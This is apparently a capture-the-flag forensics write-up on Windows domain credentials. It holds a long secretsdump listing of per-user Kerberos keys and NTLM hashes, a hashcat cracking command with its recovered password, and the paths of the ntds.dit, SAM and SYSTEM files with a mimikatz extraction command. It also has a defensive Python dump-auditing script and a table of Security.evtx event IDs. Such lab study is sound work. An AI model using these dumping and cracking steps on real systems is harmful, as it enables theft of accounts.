Kevin:aes256-cts-hmac-sha1-96:43b7751d1c3074bd9a90719bdfb1de46bc59e8791eb1df6de45e1b0cf1f52071
Kevin:aes128-cts-hmac-sha1-96:3ed50ef7239c1f4fdf7fc05bdfe2f451
Kevin:des-cbc-md5:8546e075df80fd3e
Amber:aes256-cts-hmac-sha1-96:3c51e715c551cbf36706a63dd97bd79f89a95ed1bd46414ce157c48cdd077b76
Amber:aes128-cts-hmac-sha1-96:242c8bd7cd6b79ed5e33d7f7123c9aa8
Amber:des-cbc-md5:6de06e756bad575b
Lillian:aes256-cts-hmac-sha1-96:96b235fb7b694a81c7e136be5342cae8b2f1c151480db55db9d7ebd6b9217c9c
Lillian:aes128-cts-hmac-sha1-96:a97e3811a9d0d25c7eac27a2316e4010
Lillian:des-cbc-md5:df1032b5374f4a98
Blake:aes256-cts-hmac-sha1-96:12b14056196a17ec0852ba677905874ddbb8d8e2ae494286249331e987bc8e51
Blake:aes128-cts-hmac-sha1-96:66ad920ff8ef4a2f8363388a1b700f9f
Blake:des-cbc-md5:ad4523c75be36d85
Samantha:aes256-cts-hmac-sha1-96:14f02ffa4b9bc989eb8a8b8840df596b64a95492a0fe4d8c5561ad41955680b7
Samantha:aes128-cts-hmac-sha1-96:ef51abbe5e1a0d170fd112a1a4a2090c
Samantha:des-cbc-md5:1ad676c27c1ac87f
Nicole:aes256-cts-hmac-sha1-96:5c8d68b7e0ae4fd9e5b36771698bd527a5e88a712ae4c22bd655b19a1915d7b3
Nicole:aes128-cts-hmac-sha1-96:46c9c96fefc6f8b55909ecc69a4881a4
Nicole:des-cbc-md5:b91579ef4510c49e
Logan:aes256-cts-hmac-sha1-96:40591ce121f13256826b8e6af83546432973cf1a5c31a1eb5576f43b6b72a694
Logan:aes128-cts-hmac-sha1-96:511ddca5380e6d4a2e2a0b9d0171ff12
Logan:des-cbc-md5:80f894a29d08928a
Jessica:aes256-cts-hmac-sha1-96:2fe3f0d5cc2b4cba7652870d8d244645c5369bd4d9cb645e40b991b8f7a160ea
Jessica:aes128-cts-hmac-sha1-96:d945d5ebc33231bf815cdfb186e538ef
Jessica:des-cbc-md5:45efd6d023190eea
Charlotte:aes256-cts-hmac-sha1-96:2832b3b4722402b5ee72750dea9b56210db8c7fe7761c168a25db7e1a9d268cf
Charlotte:aes128-cts-hmac-sha1-96:c44ee26970237ce2081a5828cbdabab0
Charlotte:des-cbc-md5:4926089ba8a7e997
Francis:aes256-cts-hmac-sha1-96:0732cfa9e29220872358aaf946985ebda9e167debf0412ee8c5041276ce160fb
Francis:aes128-cts-hmac-sha1-96:76058e2a6419ba17944d9f37ea18093d
Francis:des-cbc-md5:02bf3de9e543e0c2
Brittany:aes256-cts-hmac-sha1-96:fcc16041186d564c5bebc54a32aa76ba9927b8fcc075fc798efc4585352a87db
Brittany:aes128-cts-hmac-sha1-96:cb05e77257066aaa0a894ab322b16de6
Brittany:des-cbc-md5:6e57f19408f27946
Aaron:aes256-cts-hmac-sha1-96:1ad72a9f3b912d104dd301441dae66fc2ef90da01689ffbce1d981c6f7673792
Aaron:aes128-cts-hmac-sha1-96:11c0d01aa7885243337b2f1ae9c455d9
Aaron:des-cbc-md5:37b6676d19b91307
Emily:aes256-cts-hmac-sha1-96:52992869238b0b4839c6db6dda4f6b43720032e47b3249bfe4a19caee2999962
Emily:aes128-cts-hmac-sha1-96:751fe2523800366258088cd9f8c359a1
Emily:des-cbc-md5:13b940b93257cee6
Katherine:aes256-cts-hmac-sha1-96:758b87aa1fbe11963b42b76a46a14778e219815a6b19b87299af146da0082132
Katherine:aes128-cts-hmac-sha1-96:a61b0884284b1fdbe7ad7706270b3c6c
Katherine:des-cbc-md5:0ec7910e76fdda79
Nathan:aes256-cts-hmac-sha1-96:6ed510ea3da9b3b77dadcf0e1f9683ab5c076326eee53f60106f21be03c07e2e
Nathan:aes128-cts-hmac-sha1-96:6e8e3b4765ab033db2b1df04ca4da0fd
Nathan:des-cbc-md5:df9d92b379231613
Bethany:aes256-cts-hmac-sha1-96:44ded16920b1588a48aeb50e4d6e554421f8d2d2e87bf143fc3a53eabd5a97dc
Bethany:aes128-cts-hmac-sha1-96:822b1c8151b0a9c2c29a994b6d9564c2
Bethany:des-cbc-md5:da7c6d928086a49e
Derek:aes256-cts-hmac-sha1-96:913684f108b5a7cccf8333b00530ec9e78712210662de128f9865f61bc8c7dee
Derek:aes128-cts-hmac-sha1-96:47321c9441e1ba242a766bfded0e3bbb
Derek:des-cbc-md5:3e1af2e38adc9852
Abigail:aes256-cts-hmac-sha1-96:70b833e81f210afbe176366ca8ef1f17615c246efce1daa3564488256f12dc6f
Abigail:aes128-cts-hmac-sha1-96:35fa0bc32176efbf7fd3323a7d716908
Abigail:des-cbc-md5:34fb98e0453d0183
Daniel:aes256-cts-hmac-sha1-96:26a3748198d75fb82500077a61e595a7251a8830e1a1e8852bb2c1cd6072edcb
Daniel:aes128-cts-hmac-sha1-96:659897df7220dc3f90624a5a69135fd2
Daniel:des-cbc-md5:b65df86b5d850102
Ashley:aes256-cts-hmac-sha1-96:ab935a669a8fe74c5afd9f47179690022429c3d91fba803ff87f4a34836f008a
Ashley:aes128-cts-hmac-sha1-96:6bc87b24d72e8fb5c6c90934770b3d8b
Ashley:des-cbc-md5:ad2c527f61021f8c
Emma:aes256-cts-hmac-sha1-96:6db06f2f8b92ee46db78c9de9179b7408cbe2af7218d7b3709f3a9cf678a153c
Emma:aes128-cts-hmac-sha1-96:817ab112142e859a216d17db023ae5d6
Emma:des-cbc-md5:c29e4cd64fad0267
Brandon:aes256-cts-hmac-sha1-96:ee2dce89ad6a520d9494dab243f583c484444df7c0a8a6a6211fab37eb54c9f0
Brandon:aes128-cts-hmac-sha1-96:bd3d79603f130ce8bae83e5582190315
Brandon:des-cbc-md5:43aef201ae8f8351
Laura:aes256-cts-hmac-sha1-96:ffc0621435d2072391123b966a339d6116a07efc15291c5dc4d77132b2376edf
Laura:aes128-cts-hmac-sha1-96:13aeb186b5a83518f4bbe7bd2f608b8f
Laura:des-cbc-md5:324349c85b0e1558
George:aes256-cts-hmac-sha1-96:53cae56304a93b6a762617dc0cb5f9f97087e3437ac8b0e299684b355b60e087
George:aes128-cts-hmac-sha1-96:18592734077ae853cf99394b4590c909
George:des-cbc-md5:9ed525c179aedcba
Harper:aes256-cts-hmac-sha1-96:eb304b0b6c0d93076a5f7e67d69d144a0d8b2a4e7b0165a57690ef0335fad0e8
Harper:aes128-cts-hmac-sha1-96:399547164b1c50a2f51d5c42644100c9
Harper:des-cbc-md5:150497198092ea9d
Matthew:aes256-cts-hmac-sha1-96:8e9eb6e892bd0470f9a1d764f41b9cf0865ec3d271f2d3c7a45b48010b7fa755
Matthew:aes128-cts-hmac-sha1-96:630ab00434d159e4c319703348aa5c07
Matthew:des-cbc-md5:01c4850897bc19ae
Benjamin:aes256-cts-hmac-sha1-96:cbf3227b8edb84b7e05cf282acc982bf57ad868d16f31b79bfd64c8402df89a5
Benjamin:aes128-cts-hmac-sha1-96:508e75afd5858721778db4cbc67951d7
Benjamin:des-cbc-md5:20680d0ee6925801
Leah:aes256-cts-hmac-sha1-96:f3c342a8b4fa0d1534ced21b8256e424daecc8ff6c61d304501d183610fa9496
Leah:aes128-cts-hmac-sha1-96:5dc194200a238e33b8853d827e1654dc
Leah:des-cbc-md5:79ce25439e92a838
Elizabeth:aes256-cts-hmac-sha1-96:d7e8aa7e2fdc6ec714492c897e3abe05a96d7d158b7d66a7b580edb33b34472d
Elizabeth:aes128-cts-hmac-sha1-96:93b25e494b6eeb9b72301dcfb94325a7
Elizabeth:des-cbc-md5:cb8aa2b59befba10
Connor:aes256-cts-hmac-sha1-96:ab5e72fd28ec1b4c201bb8ac46fc0fa9fc6cda0f6b4bd47d63559575cab3ec34
Connor:aes128-cts-hmac-sha1-96:6265e830a18293c8ee87e3ea6b7f7665
Connor:des-cbc-md5:6ee65408b68532f2
Angela:aes256-cts-hmac-sha1-96:0e43c362897254dc9cada5f55675c73d7bd7c8ea7f84d759ba1d95d397519d96
Angela:aes128-cts-hmac-sha1-96:cb16ae5aff64fc14da9a22a005b4edc6
Angela:des-cbc-md5:20a8e66d02b03840
Aiden:aes256-cts-hmac-sha1-96:200466c671bfd62756f79c48348789811fe06756b01691dba2db0aad0a420c77
Aiden:aes128-cts-hmac-sha1-96:f83f287a27976e6eced1d1444f5dd6eb
Aiden:des-cbc-md5:eff26db952047920
Julia:aes256-cts-hmac-sha1-96:f566e3af8e52609fdab00ae8cc754e42a5d9a7e4e321b16a369a54669b24e44b
Julia:aes128-cts-hmac-sha1-96:07df647146898a9763571db6a8149e3e
Julia:des-cbc-md5:94087a9ef46b52bf
Charles:aes256-cts-hmac-sha1-96:064f7fe1ee20b21dc1ceaee7efbffa18c45e6b93d6cd50ec72638ee4f1cb8429
Charles:aes128-cts-hmac-sha1-96:9308806bc1d25e296f8edbaafbfa0da6
Charles:des-cbc-md5:7a6b6b2c8c1338bf
Adrian:aes256-cts-hmac-sha1-96:ce703b72d1765e7a0c8791248672e41d8f3a250cb354d088b2a87d5cc767b672
Adrian:aes128-cts-hmac-sha1-96:fa189c0463e0551019863da5c1333978
Adrian:des-cbc-md5:37cb0454ea43b96e
Liam:aes256-cts-hmac-sha1-96:49b1e51560375949e47165759673b0653a3fd3c8dd154d1cc14554509e01495a
Liam:aes128-cts-hmac-sha1-96:c324605385e73ed12980eae8288eee08
Liam:des-cbc-md5:2f3df7cbb073bfd0
Brooke:aes256-cts-hmac-sha1-96:9c8e2fda8f8743a3cf2c549aa6180bdf979484aa56af32b521814bc47097c80e
Brooke:aes128-cts-hmac-sha1-96:6736c776ff203e525d6dea0da3a9d2c7
Brooke:des-cbc-md5:75156832f179e0a4
Alan:aes256-cts-hmac-sha1-96:570208f6a9def255dd5567d6f62d59319d74a0c8c4fb7d281d41533364b907f0
Alan:aes128-cts-hmac-sha1-96:e8319c480d1ed57a1fd250482eb357b6
Alan:des-cbc-md5:7c407ca1cd513d9d
Ella:aes256-cts-hmac-sha1-96:ef150cd991e6a02aae3d74087a90fcc364853d2efb9d3f6e41d09c932a5df897
Ella:aes128-cts-hmac-sha1-96:99e1a83e9a4e96406be2b591f7583b22
Ella:des-cbc-md5:a8f46ee0a720e39b
Caleb:aes256-cts-hmac-sha1-96:95da18fecd659b13d89bacfe18eb321244a1b15cda8511a754b1eb76f16a912a
Caleb:aes128-cts-hmac-sha1-96:87fa1125ffe9d62a7f9b9e90c3caede0
Caleb:des-cbc-md5:ae7cf2dce92ad0e3
Noah:aes256-cts-hmac-sha1-96:a6f754e6b93cad1b3472a627ab007a710819569e9d3b44d0688dab92d2f93efd
Noah:aes128-cts-hmac-sha1-96:e9d4cebb4b663b32b17caed3c3c64edc
Noah:des-cbc-md5:ea0b2a4cea70e6e9
Donald:aes256-cts-hmac-sha1-96:f25cb2dc1269780ce6c366ee4a78a40f443ff9521e49ea709bee4b0b1e7fc5b3
Donald:aes128-cts-hmac-sha1-96:433c504d6b77d6c297605d272b02ae3d
Donald:des-cbc-md5:8cb5589152316eda
Alexander:aes256-cts-hmac-sha1-96:0aafdbdcc39a3b5d3d79e51aeff82e75dcf9cd0beba1b5c79abdfbac757e597c
Alexander:aes128-cts-hmac-sha1-96:3e7e13a98af4e2e8c1bd5c3abc00d729
Alexander:des-cbc-md5:a79832e3b658491c
Austin:aes256-cts-hmac-sha1-96:2942adb6d614d9c805f86de96ed7d83bb10d39772b83425a6b9cec610f9ad7e3
Austin:aes128-cts-hmac-sha1-96:210743007b2ee4578e9faef2c91905a0
Austin:des-cbc-md5:c81f8c464c0e97ae
Michelle:aes256-cts-hmac-sha1-96:077152b6daaa372437c6fdd3b28d95e4bfaaf3fa68c665dce5a0f101482d0cfd
Michelle:aes128-cts-hmac-sha1-96:21251e328b8cb3b84184d5485765aa86
Michelle:des-cbc-md5:f25d6eb3f8439e31
Adam:aes256-cts-hmac-sha1-96:3894f2ac25768a95e1f537224aa1949c72c0fe4a5f3cf06fdb43a91d34b9724e
Adam:aes128-cts-hmac-sha1-96:62b6a054a409457f540c44ea0ace2c3b
Adam:des-cbc-md5:cea72ab98a1562f2
Isaiah:aes256-cts-hmac-sha1-96:5eded632130c72fa261669cd660e353f9dcb1579a27b866a21345a8bc0d56b81
Isaiah:aes128-cts-hmac-sha1-96:616855dfb064127290371b24824fb929
Isaiah:des-cbc-md5:a7c28097c2f76d38
Anthony:aes256-cts-hmac-sha1-96:511d25e2720b6432d4b1d07583038c47667a106050a7375a3ef30d6f72df8e85
Anthony:aes128-cts-hmac-sha1-96:bb1fe1afb0cc57c421efef129a689a76
Anthony:des-cbc-md5:c4fbfd234f2a897a
mary:aes256-cts-hmac-sha1-96:7dde43d29a88d5ba112ef65504f0fbb816e338cfd0dbd0a00ca5bf4f71e68c71
mary:aes128-cts-hmac-sha1-96:f3354f18e63831179775895da3e2132b
mary:des-cbc-md5:e64ab92f83673123
James:aes256-cts-hmac-sha1-96:fc0072f9ff62c0c9e573f15f58a65af617003e4466ebfcfd8cb707b4e0a0e00b
James:aes128-cts-hmac-sha1-96:24cb2366b831cdd0dee62173fcd0123d
James:des-cbc-md5:79d6c837ef9b6d4a
[*] Cleaning up...

James:3193:aad3b435b51404eeaad3b435b51404ee:9fc8c6b0ac495fa52039ab6e0276a3c3:::

  • username: James
  • user ID: 3193 (the account's RID, its relative identifier)
  • LM hash: aad3b435b51404eeaad3b435b51404ee
  • NTLM hash: 9fc8c6b0ac495fa52039ab6e0276a3c3
  • remaining fields ::: (normally reserved for other information such as group membership)
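An added Python example, not from the write-up, that parses secretsdump's user:rid:lmhash:nthash::: lines and reports what a defender would act on after such a dump: accounts with a blank password (the NT hash of the empty string), accounts that still store an LM hash (anything other than the empty-LM value seen in every line above), NT hashes shared by several accounts (password reuse) and machine accounts. The sample lines are constructed except for the Guest line, which is taken from the dump above.

```python
from collections import defaultdict

# Added example, not from the original write-up: audit a secretsdump-style hash list.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password: LM storage is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample. The Guest line is from the dump above; the other hashes are made up
# and chosen only to trigger each check.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_legacy:1105:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Alice:3200:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Bob:3201:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
CLIENT$:1104:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
[*] Kerberos keys from ntds.dit
Alice:aes256-cts-hmac-sha1-96:3333333333333333333333333333333333333333333333333333333333333333
[*] Cleaning up...
"""


def parse_dump_line(line):
    """Parse 'user:rid:lmhash:nthash:::'; return None for status lines and Kerberos key lines."""
    parts = line.strip().split(":")
    if len(parts) != 7 or not parts[1].isdigit():
        return None
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    if len(lm) != 32 or len(nt) != 32:
        return None
    return {"user": user, "rid": rid, "lm": lm, "nt": nt}


def audit_dump(text):
    """Return the findings a defender cares about in a credential dump."""
    entries = [e for e in map(parse_dump_line, text.splitlines()) if e]
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "accounts": len(entries),
        # NT hash of "" means the account has no password at all
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        # a real LM hash means the weak LM algorithm is still being stored for this account
        "lm_hash_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        # identical NT hashes mean identical passwords across accounts
        "shared_nt_hash": {h: users for h, users in by_nt.items() if len(users) > 1 and h != EMPTY_NT},
        "machine_accounts": [e["user"] for e in entries if e["user"].endswith("$")],
    }


if __name__ == "__main__":
    for finding, value in audit_dump(SAMPLE_DUMP).items():
        print(f"{finding}: {value}")
```

Run against the dump above, every account has the empty LM value, so the LM check stays quiet; the blank-password check flags Guest, which is disabled by default but worth confirming.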

Crack it with hashcat: .\hashcat.exe -m 1000 9fc8c6b0ac495fa52039ab6e0276a3c3 .\rockyou.txt

maintainer-james-3011liverpool!


  • ntds.dit is a file found on domain controllers in a domain environment; it stores the credential material (hashes) of every user in the domain.

  • Outside a domain, i.e. in a workgroup, the SAM file stores the password information of the local users. Cracking either the SAM or ntds.dit also requires the SYSTEM hive.

    ntds.dit location: C:\Windows\NTDS\NTDS.dit
    SYSTEM location: C:\Windows\System32\config\SYSTEM
    SAM location: C:\Windows\System32\config\SAM
    https://blog.csdn.net/qq_41874930/article/details/108141331

Non-domain environment

Export the SAM, SYSTEM and SECURITY files from Windows\System32\config

lsadump::sam /sam:SAM /system:SYSTEM

Because this challenge is in a domain rather than a workgroup, the information recovered from SAM is incomplete


evtx file analysis

  • System.evtx

    Records events produced by the operating system's own components, such as drivers and system components, and application crashes or data-loss errors.

  • Application.evtx

    Records events from applications and system programs, for example a database program logging file errors, or application crash records.

  • Security.evtx

    Records the system's security audit events: logons, object access, process tracking, privilege use, account management, policy changes and so on. Security.evtx is also the log most often used in forensics.

    | Event ID | Description |
    |----------|-------------|
    | 4608 | Windows started |
    | 4609 | Windows shut down |
    | 4616 | System time was changed |
    | 4624 | A user logged on to the computer successfully |
    | 4625 | Logon failed: unknown user name, or known user name with a bad password |
    | 4634 | User logoff completed |
    | 4647 | User initiated logoff |
    | 4648 | A logon was attempted using explicit credentials while logged on as another user |
    | 4703 | Token right adjusted |
    | 4704 | A user right was assigned |
    | 4720 | A user account was created |
    | 4725 | A user account was disabled |
    | 4768 | A Kerberos authentication ticket (TGT) was requested |
    | 4769 | A Kerberos service ticket was requested |
    | 4770 | A Kerberos service ticket was renewed |
    | 4779 | A user disconnected a terminal server session without logging off |

Recovering user names and passwords in a non-domain environment

1. With mimikatz

  • Export the SAM, SYSTEM and SECURITY files from Windows\System32\config

  • The command lsadump::sam /sam:SAM /system:SYSTEM reads the NTLM hashes from the files; cracking those hashes yields the passwords

2. Cracking via FTP